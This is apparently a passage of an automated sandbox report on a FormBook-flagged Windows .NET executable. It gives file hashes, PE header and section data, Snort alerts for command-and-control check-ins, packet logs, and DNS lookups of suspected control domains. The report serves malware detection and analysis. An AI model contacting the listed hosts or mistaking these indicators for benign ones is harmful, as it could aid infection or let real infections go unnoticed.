                                                              • 52.217.8.51
                                                              bmws51TeIm.exeGet hashmaliciousBrowse
                                                              • 3.141.177.1
                                                              Receipt779G0D675432.htmlGet hashmaliciousBrowse
                                                              • 52.219.97.138
                                                              PaymentAdvice-copy.htmGet hashmaliciousBrowse
                                                              • 52.51.245.167
                                                              Documents_460000622_1464906353.xlsGet hashmaliciousBrowse
                                                              • 52.12.4.186
                                                              comprobante de pago bancario.exeGet hashmaliciousBrowse
                                                              • 44.227.76.166
                                                              TACA20210407.PDF.exeGet hashmaliciousBrowse
                                                              • 3.13.255.157

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hvEop8Y70Y.exe.log
                                                              Process:C:\Users\user\Desktop\hvEop8Y70Y.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1314
                                                              Entropy (8bit):5.350128552078965
                                                              Encrypted:false
                                                              SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                              MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                              SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                              SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                              SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                              Malicious:true
                                                              Reputation:high, very likely benign file
                                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):7.597441784655769
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Windows Screen Saver (13104/52) 0.07%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              File name:hvEop8Y70Y.exe
                                                              File size:652800
                                                              MD5:bd7e988ed1d92f9faf32f6a817d89329
                                                              SHA1:4ab28bec26ad120653ca060a4c735befded7551e
                                                              SHA256:94b77677478f890b5f9e0561aebc0f66b1b2fc4494d016e9b5a70ed0ba20980b
                                                              SHA512:735f20cac5d89fd1b9a0a5e23616d7779ec1dcf8d1c03a4358fcac6bd5f769653365b124ed5340e4f63ca3b3de400f05218b0a86eb91351a76e6bb00aa169995
                                                              SSDEEP:12288:lUpaVU/kLEPkVBOSHE4nYE6QHICiqE4K+IUN2qp0ukF/kKm:lUpaCkWkVBOSki6UICDyMgqauil
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....~n`..............P.................. ... ....@.. .......................`............@................................

                                                              File Icon

                                                              Icon Hash:00828e8e8686b000

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x4a05f2
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                              Time Stamp:0x606E7EFA [Thu Apr 8 03:56:42 2021 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:v4.0.30319
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                              Entrypoint Preview

                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              add dword ptr [eax], eax
                                                              add byte ptr [eax], al
                                                              add al, byte ptr [eax]
                                                              add byte ptr [eax], al
                                                              or byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              or eax, 0C000000h
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax+eax], al
                                                              add byte ptr [eax], al
                                                              pop es
                                                              add byte ptr [eax], al
                                                              add byte ptr [esi], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [edx], cl
                                                              add byte ptr [eax], al
                                                              add byte ptr [esi], cl
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], cl
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax+eax], cl
                                                              add byte ptr [eax], al
                                                              push cs
                                                              add byte ptr [eax], al
                                                              add byte ptr [esi], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [esi], cl
                                                              add byte ptr [eax], al
                                                              add byte ptr [ecx], cl
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], cl
                                                              add byte ptr [eax], al
                                                              add byte ptr [ebx], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [esi], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax+eax], al
                                                              add byte ptr [eax], al
                                                              pop es
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax+eax], cl
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add al, byte ptr [eax]
                                                              add byte ptr [eax], al
                                                              push es
                                                              add byte ptr [eax], al
                                                              add byte ptr [edx], cl
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax+eax], al
                                                              add byte ptr [eax], al
                                                              or al, byte ptr [eax]
                                                              add byte ptr [eax], al
                                                              push cs
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [ecx], cl
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax+eax], cl
                                                              add byte ptr [eax], al
                                                              add eax, 00000000h
                                                              add byte ptr [eax], al
                                                              add byte ptr [ebx], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax+eax], al
                                                              add byte ptr [eax], al
                                                              or eax, dword ptr [eax]
                                                              add byte ptr [eax], al
                                                              or eax, dword ptr [eax]
                                                              add byte ptr [eax], al
                                                              or al, 00h
                                                              add byte ptr [eax], al
                                                              or eax, 02000000h
                                                              add byte ptr [eax], al
                                                              add byte ptr [ecx], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [edx], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [esi], cl
                                                              add byte ptr [eax], al
                                                              add byte ptr [00000000h], al

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xa05a00x4f.text
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xa20000x5b4.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xa40000xc.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x20000x9eb280x9ec00False0.77720226378data7.60713416041IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                              .rsrc0xa20000x5b40x600False0.421223958333data4.09451616704IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0xa40000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountry
                                                              RT_VERSION0xa20900x324data
                                                              RT_MANIFEST0xa23c40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                              Imports

                                                              DLLImport
                                                              mscoree.dll_CorExeMain

                                                              Version Infos

                                                              DescriptionData
                                                              Translation0x0000 0x04b0
                                                              LegalCopyrightCopyright 2015
                                                              Assembly Version1.0.0.0
                                                              InternalNameHebrewValue.exe
                                                              FileVersion1.0.0.0
                                                              CompanyName
                                                              LegalTrademarks
                                                              Comments
                                                              ProductNameCodewords
                                                              ProductVersion1.0.0.0
                                                              FileDescriptionCodewords
                                                              OriginalFilenameHebrewValue.exe

                                                              Network Behavior

                                                              Snort IDS Alerts

                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                              04/08/21-11:05:00.881786TCP1201ATTACK-RESPONSES 403 Forbidden804971834.102.136.180192.168.2.5
                                                              04/08/21-11:05:11.863981TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.552.58.78.16
                                                              04/08/21-11:05:11.863981TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.552.58.78.16
                                                              04/08/21-11:05:11.863981TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.552.58.78.16
                                                              04/08/21-11:05:17.162631TCP1201ATTACK-RESPONSES 403 Forbidden804972834.102.136.180192.168.2.5
                                                              04/08/21-11:05:39.640341TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973280192.168.2.5198.148.114.222
                                                              04/08/21-11:05:39.640341TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973280192.168.2.5198.148.114.222
                                                              04/08/21-11:05:39.640341TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973280192.168.2.5198.148.114.222
                                                              04/08/21-11:05:44.885165TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973580192.168.2.5172.67.187.138
                                                              04/08/21-11:05:44.885165TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973580192.168.2.5172.67.187.138
                                                              04/08/21-11:05:44.885165TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973580192.168.2.5172.67.187.138
                                                              04/08/21-11:05:50.018144TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.534.102.136.180
                                                              04/08/21-11:05:50.018144TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.534.102.136.180
                                                              04/08/21-11:05:50.018144TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.534.102.136.180
                                                              04/08/21-11:05:50.132700TCP1201ATTACK-RESPONSES 403 Forbidden804973634.102.136.180192.168.2.5

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Apr 8, 2021 11:05:00.753881931 CEST4971880192.168.2.534.102.136.180
                                                              Apr 8, 2021 11:05:00.766098022 CEST804971834.102.136.180192.168.2.5
                                                              Apr 8, 2021 11:05:00.766237974 CEST4971880192.168.2.534.102.136.180
                                                              Apr 8, 2021 11:05:00.766391039 CEST4971880192.168.2.534.102.136.180
                                                              Apr 8, 2021 11:05:00.778568983 CEST804971834.102.136.180192.168.2.5
                                                              Apr 8, 2021 11:05:00.881786108 CEST804971834.102.136.180192.168.2.5
                                                              Apr 8, 2021 11:05:00.882003069 CEST804971834.102.136.180192.168.2.5
                                                              Apr 8, 2021 11:05:00.882057905 CEST4971880192.168.2.534.102.136.180
                                                              Apr 8, 2021 11:05:00.882086992 CEST4971880192.168.2.534.102.136.180
                                                              Apr 8, 2021 11:05:00.894256115 CEST804971834.102.136.180192.168.2.5
                                                              Apr 8, 2021 11:05:06.306000948 CEST4972180192.168.2.5147.255.37.207
                                                              Apr 8, 2021 11:05:06.474500895 CEST8049721147.255.37.207192.168.2.5
                                                              Apr 8, 2021 11:05:06.474643946 CEST4972180192.168.2.5147.255.37.207
                                                              Apr 8, 2021 11:05:06.474777937 CEST4972180192.168.2.5147.255.37.207
                                                              Apr 8, 2021 11:05:06.642904997 CEST8049721147.255.37.207192.168.2.5
                                                              Apr 8, 2021 11:05:06.645096064 CEST8049721147.255.37.207192.168.2.5
                                                              Apr 8, 2021 11:05:06.645121098 CEST8049721147.255.37.207192.168.2.5
                                                              Apr 8, 2021 11:05:06.645370007 CEST4972180192.168.2.5147.255.37.207
                                                              Apr 8, 2021 11:05:06.807363987 CEST4972180192.168.2.5147.255.37.207
                                                              Apr 8, 2021 11:05:06.975739956 CEST8049721147.255.37.207192.168.2.5
                                                              Apr 8, 2021 11:05:11.846038103 CEST4972780192.168.2.552.58.78.16
                                                              Apr 8, 2021 11:05:11.863728046 CEST804972752.58.78.16192.168.2.5
                                                              Apr 8, 2021 11:05:11.863841057 CEST4972780192.168.2.552.58.78.16
                                                              Apr 8, 2021 11:05:11.863981009 CEST4972780192.168.2.552.58.78.16
                                                              Apr 8, 2021 11:05:11.881592035 CEST804972752.58.78.16192.168.2.5
                                                              Apr 8, 2021 11:05:11.881622076 CEST804972752.58.78.16192.168.2.5
                                                              Apr 8, 2021 11:05:11.881633043 CEST804972752.58.78.16192.168.2.5
                                                              Apr 8, 2021 11:05:11.881824970 CEST4972780192.168.2.552.58.78.16
                                                              Apr 8, 2021 11:05:11.881928921 CEST4972780192.168.2.552.58.78.16
                                                              Apr 8, 2021 11:05:11.899434090 CEST804972752.58.78.16192.168.2.5
                                                              Apr 8, 2021 11:05:16.970149040 CEST4972880192.168.2.534.102.136.180
                                                              Apr 8, 2021 11:05:16.981898069 CEST804972834.102.136.180192.168.2.5
                                                              Apr 8, 2021 11:05:16.982042074 CEST4972880192.168.2.534.102.136.180
                                                              Apr 8, 2021 11:05:16.982394934 CEST4972880192.168.2.534.102.136.180
                                                              Apr 8, 2021 11:05:16.993997097 CEST804972834.102.136.180192.168.2.5
                                                              Apr 8, 2021 11:05:17.162631035 CEST804972834.102.136.180192.168.2.5
                                                              Apr 8, 2021 11:05:17.162655115 CEST804972834.102.136.180192.168.2.5
                                                              Apr 8, 2021 11:05:17.162807941 CEST4972880192.168.2.534.102.136.180
                                                              Apr 8, 2021 11:05:17.162939072 CEST4972880192.168.2.534.102.136.180
                                                              Apr 8, 2021 11:05:17.177269936 CEST804972834.102.136.180192.168.2.5
                                                              Apr 8, 2021 11:05:22.225567102 CEST4972980192.168.2.5172.67.219.254
                                                              Apr 8, 2021 11:05:22.254049063 CEST8049729172.67.219.254192.168.2.5
                                                              Apr 8, 2021 11:05:22.258522987 CEST4972980192.168.2.5172.67.219.254
                                                              Apr 8, 2021 11:05:22.258661032 CEST4972980192.168.2.5172.67.219.254
                                                              Apr 8, 2021 11:05:22.287576914 CEST8049729172.67.219.254192.168.2.5
                                                              Apr 8, 2021 11:05:22.638344049 CEST8049729172.67.219.254192.168.2.5
                                                              Apr 8, 2021 11:05:22.638375998 CEST8049729172.67.219.254192.168.2.5
                                                              Apr 8, 2021 11:05:22.638386965 CEST8049729172.67.219.254192.168.2.5
                                                              Apr 8, 2021 11:05:22.638727903 CEST4972980192.168.2.5172.67.219.254
                                                              Apr 8, 2021 11:05:22.638887882 CEST4972980192.168.2.5172.67.219.254
                                                              Apr 8, 2021 11:05:27.995213985 CEST4973180192.168.2.515.165.26.252
                                                              Apr 8, 2021 11:05:28.222207069 CEST804973115.165.26.252192.168.2.5
                                                              Apr 8, 2021 11:05:28.222632885 CEST4973180192.168.2.515.165.26.252
                                                              Apr 8, 2021 11:05:28.222840071 CEST4973180192.168.2.515.165.26.252
                                                              Apr 8, 2021 11:05:28.449460983 CEST804973115.165.26.252192.168.2.5
                                                              Apr 8, 2021 11:05:28.450283051 CEST804973115.165.26.252192.168.2.5
                                                              Apr 8, 2021 11:05:28.450304031 CEST804973115.165.26.252192.168.2.5
                                                              Apr 8, 2021 11:05:28.450421095 CEST4973180192.168.2.515.165.26.252
                                                              Apr 8, 2021 11:05:28.450448036 CEST804973115.165.26.252192.168.2.5
                                                              Apr 8, 2021 11:05:28.450572968 CEST804973115.165.26.252192.168.2.5
                                                              Apr 8, 2021 11:05:28.450589895 CEST804973115.165.26.252192.168.2.5
                                                              Apr 8, 2021 11:05:28.450630903 CEST4973180192.168.2.515.165.26.252
                                                              Apr 8, 2021 11:05:28.450726986 CEST804973115.165.26.252192.168.2.5
                                                              Apr 8, 2021 11:05:28.450849056 CEST804973115.165.26.252192.168.2.5
                                                              Apr 8, 2021 11:05:28.450860023 CEST4973180192.168.2.515.165.26.252
                                                              Apr 8, 2021 11:05:28.450865030 CEST804973115.165.26.252192.168.2.5
                                                              Apr 8, 2021 11:05:28.450882912 CEST804973115.165.26.252192.168.2.5
                                                              Apr 8, 2021 11:05:28.450922012 CEST4973180192.168.2.515.165.26.252
                                                              Apr 8, 2021 11:05:28.451035976 CEST4973180192.168.2.515.165.26.252
                                                              Apr 8, 2021 11:05:38.876858950 CEST4973280192.168.2.5198.148.114.222
                                                              Apr 8, 2021 11:05:39.031982899 CEST8049732198.148.114.222192.168.2.5
                                                              Apr 8, 2021 11:05:39.032156944 CEST4973280192.168.2.5198.148.114.222
                                                              Apr 8, 2021 11:05:39.640341043 CEST4973280192.168.2.5198.148.114.222
                                                              Apr 8, 2021 11:05:39.795358896 CEST8049732198.148.114.222192.168.2.5
                                                              Apr 8, 2021 11:05:39.795466900 CEST8049732198.148.114.222192.168.2.5
                                                              Apr 8, 2021 11:05:39.795480967 CEST8049732198.148.114.222192.168.2.5
                                                              Apr 8, 2021 11:05:39.795617104 CEST4973280192.168.2.5198.148.114.222
                                                              Apr 8, 2021 11:05:39.795866966 CEST4973280192.168.2.5198.148.114.222
                                                              Apr 8, 2021 11:05:39.950716019 CEST8049732198.148.114.222192.168.2.5
                                                              Apr 8, 2021 11:05:44.854573965 CEST4973580192.168.2.5172.67.187.138
                                                              Apr 8, 2021 11:05:44.884535074 CEST8049735172.67.187.138192.168.2.5
                                                              Apr 8, 2021 11:05:44.884691954 CEST4973580192.168.2.5172.67.187.138
                                                              Apr 8, 2021 11:05:44.885164976 CEST4973580192.168.2.5172.67.187.138
                                                              Apr 8, 2021 11:05:44.913573027 CEST8049735172.67.187.138192.168.2.5
                                                              Apr 8, 2021 11:05:44.938178062 CEST8049735172.67.187.138192.168.2.5
                                                              Apr 8, 2021 11:05:44.938205004 CEST8049735172.67.187.138192.168.2.5
                                                              Apr 8, 2021 11:05:44.938432932 CEST4973580192.168.2.5172.67.187.138
                                                              Apr 8, 2021 11:05:44.938576937 CEST4973580192.168.2.5172.67.187.138
                                                              Apr 8, 2021 11:05:44.967991114 CEST8049735172.67.187.138192.168.2.5
                                                              Apr 8, 2021 11:05:50.005429983 CEST4973680192.168.2.534.102.136.180
                                                              Apr 8, 2021 11:05:50.017787933 CEST804973634.102.136.180192.168.2.5
                                                              Apr 8, 2021 11:05:50.017981052 CEST4973680192.168.2.534.102.136.180
                                                              Apr 8, 2021 11:05:50.018143892 CEST4973680192.168.2.534.102.136.180
                                                              Apr 8, 2021 11:05:50.030426025 CEST804973634.102.136.180192.168.2.5
                                                              Apr 8, 2021 11:05:50.132699966 CEST804973634.102.136.180192.168.2.5
                                                              Apr 8, 2021 11:05:50.132745028 CEST804973634.102.136.180192.168.2.5
                                                              Apr 8, 2021 11:05:50.134383917 CEST4973680192.168.2.534.102.136.180
                                                              Apr 8, 2021 11:05:50.134418964 CEST4973680192.168.2.534.102.136.180
                                                              Apr 8, 2021 11:05:50.147910118 CEST804973634.102.136.180192.168.2.5

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Apr 8, 2021 11:03:45.768506050 CEST6206053192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:03:45.781282902 CEST53620608.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:03:45.853432894 CEST6180553192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:03:45.866113901 CEST53618058.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:03:46.795433044 CEST5479553192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:03:46.808278084 CEST53547958.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:03:48.195389032 CEST4955753192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:03:48.213129997 CEST53495578.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:03:48.561084032 CEST6173353192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:03:48.573807001 CEST53617338.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:03:58.365317106 CEST6544753192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:03:58.378695965 CEST53654478.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:04:00.358462095 CEST5244153192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:04:00.372343063 CEST53524418.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:04:02.370502949 CEST6217653192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:04:02.383708954 CEST53621768.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:04:08.876157999 CEST5959653192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:04:08.894535065 CEST53595968.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:04:10.113761902 CEST6529653192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:04:10.128612041 CEST53652968.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:04:12.499480963 CEST6318353192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:04:12.513873100 CEST53631838.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:04:13.673145056 CEST6015153192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:04:13.686423063 CEST53601518.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:04:14.710025072 CEST5696953192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:04:14.722381115 CEST53569698.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:04:21.283379078 CEST5516153192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:04:21.295824051 CEST53551618.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:04:33.479020119 CEST5475753192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:04:33.497030973 CEST53547578.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:04:41.631380081 CEST4999253192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:04:41.649642944 CEST53499928.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:05:00.714267969 CEST6007553192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:05:00.747749090 CEST53600758.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:05:02.661124945 CEST5501653192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:05:02.673899889 CEST53550168.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:05:05.897324085 CEST6434553192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:05:06.244898081 CEST53643458.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:05:10.868768930 CEST5712853192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:05:10.882148981 CEST53571288.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:05:11.822540998 CEST5479153192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:05:11.844794035 CEST53547918.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:05:16.929538012 CEST5046353192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:05:16.968993902 CEST53504638.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:05:22.180048943 CEST5039453192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:05:22.213840961 CEST53503948.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:05:27.426110029 CEST5853053192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:05:27.460290909 CEST53585308.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:05:27.659332991 CEST5381353192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:05:27.993830919 CEST53538138.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:05:33.483378887 CEST6373253192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:05:33.556996107 CEST53637328.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:05:38.572279930 CEST5734453192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:05:38.862267971 CEST53573448.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:05:40.617852926 CEST5445053192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:05:40.630655050 CEST53544508.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:05:42.410048008 CEST5926153192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:05:42.436409950 CEST53592618.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:05:44.809158087 CEST5715153192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:05:44.853007078 CEST53571518.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:05:49.980235100 CEST5941353192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:05:50.003463030 CEST53594138.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:05:55.153040886 CEST6051653192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:05:55.490092039 CEST53605168.8.8.8192.168.2.5
                                                              Apr 8, 2021 11:06:00.510436058 CEST5164953192.168.2.58.8.8.8
                                                              Apr 8, 2021 11:06:00.623815060 CEST53516498.8.8.8192.168.2.5

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                              Apr 8, 2021 11:05:00.714267969 CEST192.168.2.58.8.8.80x7430Standard query (0)www.runcouver.comA (IP address)IN (0x0001)
                                                              Apr 8, 2021 11:05:05.897324085 CEST192.168.2.58.8.8.80x33eeStandard query (0)www.aa29996.comA (IP address)IN (0x0001)
                                                              Apr 8, 2021 11:05:11.822540998 CEST192.168.2.58.8.8.80x5155Standard query (0)www.ux300e.comA (IP address)IN (0x0001)
                                                              Apr 8, 2021 11:05:16.929538012 CEST192.168.2.58.8.8.80x26e0Standard query (0)www.mvprunning.comA (IP address)IN (0x0001)
                                                              Apr 8, 2021 11:05:22.180048943 CEST192.168.2.58.8.8.80x3495Standard query (0)www.getboostphlo.comA (IP address)IN (0x0001)
                                                              Apr 8, 2021 11:05:27.659332991 CEST192.168.2.58.8.8.80xfde6Standard query (0)www.okitmall.comA (IP address)IN (0x0001)
                                                              Apr 8, 2021 11:05:33.483378887 CEST192.168.2.58.8.8.80x1b1bStandard query (0)www.morrealeestates.comA (IP address)IN (0x0001)
                                                              Apr 8, 2021 11:05:38.572279930 CEST192.168.2.58.8.8.80xfc66Standard query (0)www.cqsjny.comA (IP address)IN (0x0001)
                                                              Apr 8, 2021 11:05:44.809158087 CEST192.168.2.58.8.8.80x28d8Standard query (0)www.betbonusuk.comA (IP address)IN (0x0001)
                                                              Apr 8, 2021 11:05:49.980235100 CEST192.168.2.58.8.8.80x31e7Standard query (0)www.yashaerotech.comA (IP address)IN (0x0001)
                                                              Apr 8, 2021 11:05:55.153040886 CEST192.168.2.58.8.8.80x67Standard query (0)www.gmopanama.comA (IP address)IN (0x0001)
                                                              Apr 8, 2021 11:06:00.510436058 CEST192.168.2.58.8.8.80x9958Standard query (0)www.adamspartnership.comA (IP address)IN (0x0001)

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                              Apr 8, 2021 11:05:00.747749090 CEST8.8.8.8192.168.2.50x7430No error (0)www.runcouver.comruncouver.comCNAME (Canonical name)IN (0x0001)
                                                              Apr 8, 2021 11:05:00.747749090 CEST8.8.8.8192.168.2.50x7430No error (0)runcouver.com34.102.136.180A (IP address)IN (0x0001)
